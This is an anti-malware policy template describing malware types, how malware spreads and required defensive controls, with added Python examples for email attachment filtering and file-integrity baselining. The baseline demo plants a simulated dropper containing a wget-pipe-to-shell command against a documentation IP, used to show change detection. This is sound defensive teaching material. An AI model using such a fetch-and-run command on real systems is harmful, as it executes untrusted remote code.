Comprehensive Anti-Malware Policy Guide

The Anti-Malware Policy outlines the organization's approach to defending against malware threats, which can originate from various sources including organized crime and rogue employees. It details the types of malware, how they spread, and the necessary controls such as firewalls, anti-virus software, spam filtering, and user awareness training to mitigate risks. The policy is intended for IT and information security staff and applies to all systems and individuals with access to the organization's information systems.



Anti-Malware Policy

Document Classification: Confidential


Version: 1
Dated: 02 March 2021
Document Author:
Document Owner:

Version 1 Page 2 of 10 02 March 2021



Revision History

Version | Date | Revision Author | Summary of Changes

Distribution

Name | Title

Approval

Name | Position | Signature | Date


Contents

1 Introduction
2 The Malware Threat
2.1 Definition
2.2 Types of Malware
2.3 How Malware Spreads
2.3.1 Phishing
2.3.2 Websites and Mobile Code
2.3.3 Removable Media
2.3.4 Hacking
3 Anti-Malware Policy
3.1 Firewall
3.2 Anti-Virus
3.3 Spam Filtering
3.4 Software Installation and Scanning
3.5 Vulnerability Management
3.6 User Awareness Training
3.7 Threat Monitoring and Alerts
3.8 Technical Reviews
3.9 Malware Incident Management


1 Introduction

The threat posed by malware has never been more serious than it is today.
[Organization Name] systems and users are under constant bombardment from
attempts to circumvent security in order to make some kind of gain or to disrupt
the normal operation of the organization.

This threat can come from a number of sources including:

 Organised gangs attempting to steal money or commit blackmail
 Competitor organizations trying to obtain confidential information
 Politically motivated groups
 Rogue employees within the organization
 Nation state sponsored “cyber-warfare” units
 Individuals exercising curiosity or testing their skills

Whatever the source, the result of a successful security breach is that the
organization and its stakeholders are affected, sometimes seriously, and harm is
caused.

One of the primary tools used by such attackers is malware, and it is essential
that [Organization Name] takes effective precautions to protect itself against
this threat.

This document sets out the organization’s policy with regard to defence against
malware. Its intended audience is IT and information security management and
support staff who will implement and maintain the organization’s defences. Malware-
related information and advice for users is included in associated policy documents
referenced below.

This control applies to all systems, people and processes that constitute the
organization’s information systems, including board members, directors, employees,
suppliers and other third parties who have access to [Organization Name] systems.

The following policies and procedures are relevant to this document:

 Mobile Device Policy
 Teleworking Policy
 Acceptable Use Policy
 Information Security Incident Response Procedure


2 The Malware Threat

2.1 Definition

There is no single definition of the term “Malware” in use but for the purposes of this
policy the following definition is used:

“Malware is any code or software that may be harmful or destructive to the
information processing capabilities of the organization”

The term is derived from the phrase “Malicious Software” and may also be called
malicious code or commonly (but inaccurately) “a virus”.

2.2 Types of Malware

Malware comes in many forms and is constantly changing as previous attack routes
are closed and new ones are found. The most common types of malware found
today are:

 Virus – a program that performs an unwanted function on the infected
computer. This could involve destructive actions or the collection of
information that can be used by the attacker
 Trojan – a program that pretends to be legitimate code but conceals other
unwanted functions. Often disguised as a game or useful utility program
 Worm – a program that is capable of copying itself onto other computers or
devices without user interaction
 Logic bomb – malicious code that has been set to run at a specified date and
time or when certain conditions are met
 Rootkit – a program used to disguise malicious activities on a computer by
hiding the processes and files from the user
 Keylogger – code that records keystrokes entered by the user
 Backdoor – a program that allows unauthorised access at will to an attacker

Often these types of malware will be used in combination with each other. For
example, an attacker will encourage an unwitting user to infect a computer with a
virus which will allow unauthorised access. This initial access will then be used to
install a rootkit to disguise further activities, a keylogger to capture keystrokes and a
backdoor to allow future access without detection.

2.3 How Malware Spreads

In order for malicious software to carry out its intended purpose it needs to be
installed on the target device or computer. There are a number of key ways in which
malware infects computers and networks, although new ways are being created all
the time.


The most common infection techniques are as follows.

2.3.1 Phishing

This method involves tricking the user into taking some action that causes a
malicious program to run and infect the computer being used. It is usually achieved
via the blanket sending of unsolicited emails (Spam) with file attachments or web
links included in them. When the user opens the file or clicks on the link the
malicious action is triggered.

Phishing attacks have become more sophisticated in recent years and can be very
believable and enticing to the user. More targeted forms have appeared, such as
Spear Phishing (aimed at a particular organization or individual and written
using details specific to that target) and Whaling (aimed at senior executives).

2.3.2 Websites and Mobile Code

The widespread use of mobile code such as JavaScript on websites has provided
attackers with another route to infect computers with malware. Often websites will be
created to host the malware which is activated either upon clicking on a link or in
some cases simply by visiting the website.

Increasingly, legitimate websites are being compromised and made to host malware
without the owner’s knowledge, making this type of attack very difficult for the user to
avoid.

2.3.3 Removable Media

USB memory sticks, CDs, DVDs and other removable media devices provide an
effective way of spreading malware onto additional computers. When the media is
inserted into the machine the malware will either run and infect the target or will copy
itself onto the removable media in order to prepare to infect the next machine it is
plugged into.

2.3.4 Hacking

Hacking, or “cracking” as it is more accurately known, is a more targeted and
therefore less common method of introducing malware onto a computer or network.
It involves gaining unauthorised access to the network from outside (and
sometimes inside) the organization. This method requires more knowledge on the
part of the perpetrator and often exploits existing vulnerabilities in the
software or network devices in use. Once access has been gained, malware is
installed remotely onto the compromised machine.


3 Anti-Malware Policy

In order to prevent the infection of [Organization Name] computers and networks
and avoid the potentially dire consequences of such infection, there are a
number of key controls that will be adopted as policy.

The key concept adopted in this policy is “defence in depth” and no single control
should be relied upon to provide adequate protection. This is therefore not a choice
between controls but a list of necessary controls, all of which should be implemented
where possible to guard against the threats outlined in the previous section.

3.1 Firewall

A firewall will be installed at all points at which the internal network is connected to
the Internet.

Where possible, individual firewalls will be enabled on client computers. Access
permissions must be set such that the user cannot disable the firewall.

3.2 Anti-Virus

A commercial, supported anti-virus platform ‘Symantec’ will be installed within the
organization at key locations:

 Firewall
 Email servers
 Proxy servers
 All other servers
 All user computers
 Mobile devices, including laptops (phones and tablets where possible)

All anti-virus clients will be set to obtain signature updates on a regular basis, either
directly from the vendor website or from a central server within the organization.

By default, on-access scanning must be enabled to provide real-time protection.
Regular full scans must also be carried out at least weekly.

Users must not be able to disable the protection which is configured centrally.

3.3 Spam Filtering

A system will be installed to filter out unsolicited and potentially harmful emails
(spam). Types of attachments known to often contain malware must be blocked or
removed before delivery to the user.
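The attachment-blocking requirement above is the one control in this section that a mail gateway actually has to implement, and the naive version (look at the last extension) is easy to evade. The following is an added example, written for this page and not part of the policy or of any product it names; it uses only the Python standard library. The blocklist, the sample message and its dummy attachment bytes are constructed assumptions for illustration. Every suffix in the filename is checked (so “invoice.pdf.exe” is caught), trailing dots and spaces are ignored as Windows does when saving, and any name carrying the Unicode right-to-left override character is rejected outright because it lets “report\u202efdp.exe” display as “reportexe.pdf”.

```python
"""Strip attachments with blocked extensions before delivery (added example)."""
import email
from email import policy
from email.message import EmailMessage

# Assumed blocklist: extensions that commonly carry malware. An organization
# would maintain its own approved list; this one is illustrative only.
BLOCKED_EXTENSIONS = {
    "exe", "scr", "com", "pif", "bat", "cmd", "js", "jse", "vbs", "vbe", "wsf",
    "hta", "ps1", "msi", "dll", "lnk", "iso", "img", "docm", "xlsm", "pptm",
}
# U+202E (right-to-left override) reverses how the rest of the name is drawn,
# so any filename containing it is treated as hostile regardless of extension.
RTL_OVERRIDE = "\u202e"


def is_blocked_filename(name: str) -> bool:
    """Return True if an attachment with this name must not reach the user.

    Every suffix after the first dot is checked, not only the last one, so
    double-extension tricks such as 'invoice.pdf.exe' and 'setup.exe.txt' are
    caught. Trailing dots and spaces are stripped because Windows drops them
    when the file is saved, which would otherwise defeat a last-suffix check.
    """
    if not name:
        return False
    if RTL_OVERRIDE in name:
        return True
    parts = name.lower().rstrip(" .").split(".")
    return any(part in BLOCKED_EXTENSIONS for part in parts[1:])


def strip_blocked_attachments(raw: bytes) -> tuple[EmailMessage, list[str]]:
    """Parse a raw RFC 5322 message and replace blocked attachments in place.

    Each blocked part becomes a short text/plain notice so the recipient can
    see that something was removed; the list of removed names is returned for
    logging and for raising an incident under section 3.9.
    """
    msg = email.message_from_bytes(raw, policy=policy.default)
    removed: list[str] = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        name = part.get_filename()
        if name and is_blocked_filename(name):
            removed.append(name)
            # set_content() first clears every Content-* header of the part,
            # including the Content-Disposition that carried the filename.
            part.set_content(f"[Attachment '{name}' removed by anti-malware policy]")
    return msg, removed


def remaining_attachment_names(msg: EmailMessage) -> list[str]:
    """Filenames still attached after filtering."""
    return [p.get_filename() for p in msg.walk()
            if not p.is_multipart() and p.get_filename()]


def build_sample_message() -> bytes:
    """Constructed phishing-style message; the attachment bodies are dummy bytes."""
    m = EmailMessage()
    m["From"] = "accounts@example.invalid"
    m["To"] = "user@example.invalid"
    m["Subject"] = "Outstanding invoice"
    m.set_content("Please see the attached invoice and payroll sheet.")
    m.add_attachment(b"%PDF-1.4\n% constructed sample, not a real document\n",
                     maintype="application", subtype="pdf", filename="invoice.pdf")
    m.add_attachment(b"MZ" + b"\x00" * 62,  # fake PE header only, no code
                     maintype="application", subtype="octet-stream",
                     filename="invoice.pdf.exe")
    m.add_attachment(b"PK\x03\x04",  # fake zip/OOXML header only
                     maintype="application", subtype="octet-stream",
                     filename="payroll.docm")
    return m.as_bytes()


if __name__ == "__main__":
    filtered, dropped = strip_blocked_attachments(build_sample_message())
    print("removed:", dropped)
    print("delivered:", remaining_attachment_names(filtered))
```

Replacing the part with a notice, rather than silently deleting it, keeps the user informed and leaves an audit trail; a gateway that quarantines the whole message instead would call the same `is_blocked_filename` check and reject on the first hit. Extension matching alone does not cover password-protected archives or macro content inside otherwise-allowed types, which is why section 3.2 still requires scanning on the email servers themselves.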


3.4 Software Installation and Scanning

Users must not have sufficient administrative access to their computer to allow them
to install software onto it. Only approved software will be allowed and this must be
installed by the IT department upon authorised request.

Regular scanning of user computers to detect unauthorised software must be carried
out.

3.5 Vulnerability Management

Information on software vulnerabilities will be collected from vendors and
third-party sources and updates applied where available. If possible, and if
permitted by the organizational change management policy, updates will be
applied automatically as soon as they are released.

Vulnerability scanning must be carried out regularly, particularly on
business-critical servers and networks.

For new vulnerabilities identified by [Organization Name] employees, a
coordinated disclosure policy will apply.

3.6 User Awareness Training

Users must be made aware when starting with the organization of the information
security policy and be trained in ways to avoid falling victim to attacks such as
phishing.

This awareness training must be repeated on a regular basis to all employees who
make use of IT equipment.

3.7 Threat Monitoring and Alerts

Information about emerging threats will be obtained from appropriate sources and
users alerted proactively of potential attacks, giving as much detail as possible to
maximise the chance of recognition.

3.8 Technical Reviews

Regular reviews will be carried out of business-critical servers and networks to
identify any malware that has been installed since the last review. This will
include taking a snapshot of the configuration for later comparison purposes.
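The snapshot-and-compare review described above is a file-integrity baseline: record what is on the server now, and at the next review list everything that has been added, removed or altered since. The code below is an added example written for this page, not the policy's own tooling and not any specific product; it uses only the Python standard library. The directory layout, file contents and the simulated intruder changes in `demo()` are constructed, and `203.0.113.7` is a documentation-only address. Each regular file is recorded by SHA-256 digest, size and permission bits, so a planted binary, a rewritten cron job, a deleted hardening file or a bare `chmod u+s` all show up in the comparison.

```python
"""Configuration baseline snapshot and comparison (added example)."""
import hashlib
import json
import os
import stat
import tempfile
from pathlib import Path


def file_digest(path: Path) -> str:
    """SHA-256 of a file, read in chunks so large binaries are not loaded whole."""
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def snapshot(root: Path) -> dict[str, dict]:
    """Map each regular file under root to its hash, size and permission bits.

    lstat() is used and anything that is not a regular file is skipped, so a
    symlink planted to point at a device or a huge file cannot stall the review.
    """
    entries: dict[str, dict] = {}
    for dirpath, dirnames, filenames in os.walk(root):
        dirnames.sort()  # deterministic traversal order
        for name in sorted(filenames):
            p = Path(dirpath) / name
            st = p.lstat()
            if not stat.S_ISREG(st.st_mode):
                continue
            rel = p.relative_to(root).as_posix()
            entries[rel] = {
                "sha256": file_digest(p),
                "size": st.st_size,
                "mode": oct(st.st_mode & 0o7777),  # includes setuid/setgid bits
            }
    return entries


def save_baseline(entries: dict, dest: Path) -> None:
    dest.write_text(json.dumps(entries, indent=2, sort_keys=True))


def load_baseline(src: Path) -> dict:
    return json.loads(src.read_text())


def compare(baseline: dict, current: dict) -> dict[str, list[str]]:
    """Report paths added, removed, or changed in content, size or mode."""
    before, after = set(baseline), set(current)
    return {
        "added": sorted(after - before),
        "removed": sorted(before - after),
        "modified": sorted(p for p in before & after if baseline[p] != current[p]),
    }


def demo() -> dict[str, list[str]]:
    """Build a constructed mini filesystem, baseline it, then simulate a compromise."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp) / "host"
        for rel, text in {
            "etc/ssh/sshd_config": "PermitRootLogin no\n",
            "etc/cron.d/backup": "0 2 * * * root /usr/local/bin/backup\n",
            "usr/local/bin/backup": "#!/bin/sh\nrsync -a /srv/ /backup/\n",
        }.items():
            p = root / rel
            p.parent.mkdir(parents=True, exist_ok=True)
            p.write_text(text)
        baseline_file = Path(tmp) / "baseline.json"  # in practice, keep this off-host
        save_baseline(snapshot(root), baseline_file)

        # Simulated post-baseline intruder activity (constructed for the example):
        # a dropper is planted, the cron job is pointed at it, and the SSH
        # hardening file is deleted.
        (root / "usr/local/bin/dropper").write_text(
            "#!/bin/sh\nwget -qO- http://203.0.113.7/x | sh\n")
        (root / "etc/cron.d/backup").write_text(
            "0 2 * * * root /usr/local/bin/dropper\n")
        (root / "etc/ssh/sshd_config").unlink()

        return compare(load_baseline(baseline_file), snapshot(root))


if __name__ == "__main__":
    print(json.dumps(demo(), indent=2))
```

The baseline is only as trustworthy as its storage: an intruder who can edit `baseline.json` on the reviewed host can hide every change, so the file belongs on a separate system (or is signed) and the comparison is run from there. A rootkit of the kind listed in section 2.2 can also hide files from the userland `os.walk`, which is why this review complements, rather than replaces, the anti-virus scanning required in section 3.2.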


3.9 Malware Incident Management

In the event that malware is detected on a server, client, network or other IT
component, an information security incident will be raised. This will be managed
in accordance with the procedures set out in the Information Security Incident
Response Procedure.
